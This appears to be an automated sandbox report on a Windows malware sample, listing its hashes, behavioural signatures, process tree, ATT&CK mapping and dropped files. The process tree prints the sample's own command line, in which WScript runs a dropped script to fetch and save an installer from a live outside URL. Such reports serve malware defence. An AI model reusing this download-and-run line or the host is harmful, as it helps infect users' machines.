41f13f96f78be799112e4a533e8a55bacada6d56e9fbd0f2aa9ee4d3cd154706

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
02-05-2024 05:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe
Size

184KB
MD5

0da08a71e57c1f4bd11a048f5221a483
SHA1

b1688418a118353d15eebcd8bc27344f75bdd2d4
SHA256

41f13f96f78be799112e4a533e8a55bacada6d56e9fbd0f2aa9ee4d3cd154706
SHA512

6c353d6b8aaf2afbabca4ba509a148b87be61e9d727205099a93047cadcaff4758ed805d9fdce915c604da4a6256587d545b66cd0db1c50c19bbae246a645932
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3O:/7BSH8zUB+nGESaaRvoB7FJNndn3

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	3008	WScript.exe
8	3008	WScript.exe
10	3008	WScript.exe
12	2440	WScript.exe
13	2440	WScript.exe
15	2556	WScript.exe
16	2556	WScript.exe
18	1312	WScript.exe
19	1312	WScript.exe
21	2760	WScript.exe
22	2760	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2224	1968	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1968 wrote to memory of 3008	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	28
PID 1968 wrote to memory of 3008	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	28
PID 1968 wrote to memory of 3008	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	28
PID 1968 wrote to memory of 3008	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	28
PID 1968 wrote to memory of 2440	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	30
PID 1968 wrote to memory of 2440	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	30
PID 1968 wrote to memory of 2440	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	30
PID 1968 wrote to memory of 2440	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	30
PID 1968 wrote to memory of 2556	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	32
PID 1968 wrote to memory of 2556	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	32
PID 1968 wrote to memory of 2556	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	32
PID 1968 wrote to memory of 2556	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	32
PID 1968 wrote to memory of 1312	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	34
PID 1968 wrote to memory of 1312	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	34
PID 1968 wrote to memory of 1312	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	34
PID 1968 wrote to memory of 1312	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	34
PID 1968 wrote to memory of 2760	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	36
PID 1968 wrote to memory of 2760	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	36
PID 1968 wrote to memory of 2760	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	36
PID 1968 wrote to memory of 2760	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	36
PID 1968 wrote to memory of 2224	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	38
PID 1968 wrote to memory of 2224	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	38
PID 1968 wrote to memory of 2224	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	38
PID 1968 wrote to memory of 2224	1968	0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0da08a71e57c1f4bd11a048f5221a483_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1968
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf648.js" http://www.djapp.info/?domain=YjRGZxDfDx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf648.exe
  2⤵
  - Blocklisted process makes network request
  PID:3008
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf648.js" http://www.djapp.info/?domain=YjRGZxDfDx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf648.exe
  2⤵
  - Blocklisted process makes network request
  PID:2440
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf648.js" http://www.djapp.info/?domain=YjRGZxDfDx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf648.exe
  2⤵
  - Blocklisted process makes network request
  PID:2556
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf648.js" http://www.djapp.info/?domain=YjRGZxDfDx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf648.exe
  2⤵
  - Blocklisted process makes network request
  PID:1312
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf648.js" http://www.djapp.info/?domain=YjRGZxDfDx.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=KoR1JwXQ_LrsDjMuaUM9CgqlVE0PvlMlmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGIgkQVe88uQeqVvF6ZIoKUhkpvZWpzwXHeObuK-6mX4GJU2Nia1-_MKHVlwz C:\Users\Admin\AppData\Local\Temp\fuf648.exe
  2⤵
  - Blocklisted process makes network request
  PID:2760
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 464
  2⤵
  - Program crash
  PID:2224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
a240d3899f5c942fa4d758eaa3f6cffd

SHA1
ab28b7e179d0b320b32b40f9302c6692bab2f06e

SHA256
fd668a44e7e00cb370d96f1ed1de4a6853f0fe2679fbb5e9cc211450d7cd6111

SHA512
8d774eda4fba5de333e50be8503c902c5f8aa6bc4516a0cad95f8cb8d697924fb88696b22cc712c6468ee9e8866a29c71d24f16d4e19dd0ded38069602babeee

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
d10fa31b0a99445ba9c3b674996ee767

SHA1
7ca33593978d1444094c4d1c2560cccc862f065d

SHA256
ff464a780a031d7c7092a53ea087cf1fd7987d61f50413385f619aa1c72941ea

SHA512
cdcb68429615bda9f8f5fd1b8036a8a0083dfd828c277829d9b1641b050691dfc3d0481a64f722268f5461005f7902e2496fb2fe97d17a2f97985e6c72325c55

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
f953e645efabdf8678a7eae731641f3a

SHA1
4995f26bec7a7176fa687a7d3bb689351ed70a70

SHA256
c4f1de48506eebc80adc606e08021ddbc9d5ec4297033c72a0b0a0eeaf52eea8

SHA512
9a4b466c6bd594b302fa57ac898408d7611f11d351a6e525c52d0623022b1c29b66008e189bf86ad93d54c9e5b703d57b920b44394824e65b1184931108c616a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
da9a47ab9251cf2d9fde43ebb2e79179

SHA1
2797df3b99388133fe548251e1a741f99e57cd5e

SHA256
fa64c86111d79b82489e66c3eb16c919964146b8c76f808c559cbb350bc9deb2

SHA512
aa1c8bd5efc65ef7f99993220743633a199633c7349727bb0205a0f8ebd619e6004ed92c3e86e0abbee5b3af25fa6c00072917f79cbdab276e6e38b2130bacab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
4f3128eee8815ddf3a163f0824010294

SHA1
2bb33cb87821d6b905a4be7d5a8448f6c0119a34

SHA256
6a2666f7b466f6b2505a10f3edd27603d55ee72258a4538327a9b80de5c5e826

SHA512
1bfe5815a0ee249af2e7bb00acb6ebcc31a7a5f9ebff75805aac46e6b930c5b90b5ab696e682fae643e34d5658dcaf0c58c228384678476efbd4535900bf6d44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
79c005a49a0f8ed794e6beb790484f84

SHA1
bfc219696ecb3e88e09e1b2debe865f355209b88

SHA256
a44180e66e23beb5a5f38ff8e20021d96d70ce9602c62b0d69616ed33ff92cc5

SHA512
c48c36d5f12cf55dac41a9757816d3f9252e024fda837bf391d51f25cabcee7ce4e8f9175e161a8f69cd511e7755cbac061381291c809b9170b71b287ac99274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
d1cf289edffcb21cd2d89ce21cc6231b

SHA1
ee08b94055cbeaa91c04333f5df08bc5d2726dd1

SHA256
27e1168a78543209ab76e5ea90ba442c81b05f50130dfc7747e68a6403dbae7f

SHA512
f4ce35c8da56570284a2085d26d4d353e0f2df7355a70a1867f0f3d117c8732f211fb45276e8a9eadfeab875789133c8bbead271c62982db065c8c24d08144bc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
eb12f3cc41f959218f9c97ba7f8fb6ed

SHA1
ab0b1c7e60dd08377be18faea1f6f8439f91832d

SHA256
11eb7435e0153ef87a951058fb1ea1c597b852ee5db206eb23511c9780d908ce

SHA512
827ffc6d3f84682c40de3cb2b31be52051adf430c4456d88e5bcb6fd089dbf37ba4fb3e969786d1f9991cabab37b832c671f9980fb928e22126196bc1120fcf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3591.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4DD3.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf648.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\9YHY99GG.txt

Filesize
177B

MD5
4fb366f99d3fa616432bbcb39baf999b

SHA1
d94db105e16d7f213d55d059f31b56360338b098

SHA256
e47a98f63d8036049d7b9624b1d57cb5e457081f1671fb5b7b581b5e5c3d3553

SHA512
08ffd74ce9ff7a2a1390a05c54ebeee0a194568385e50bcf372c2341bc81198ba2e1ed43e9010f118e05fd449a4a031f7b1359addfa8d7c2d4858c3b723473e4

Download Submit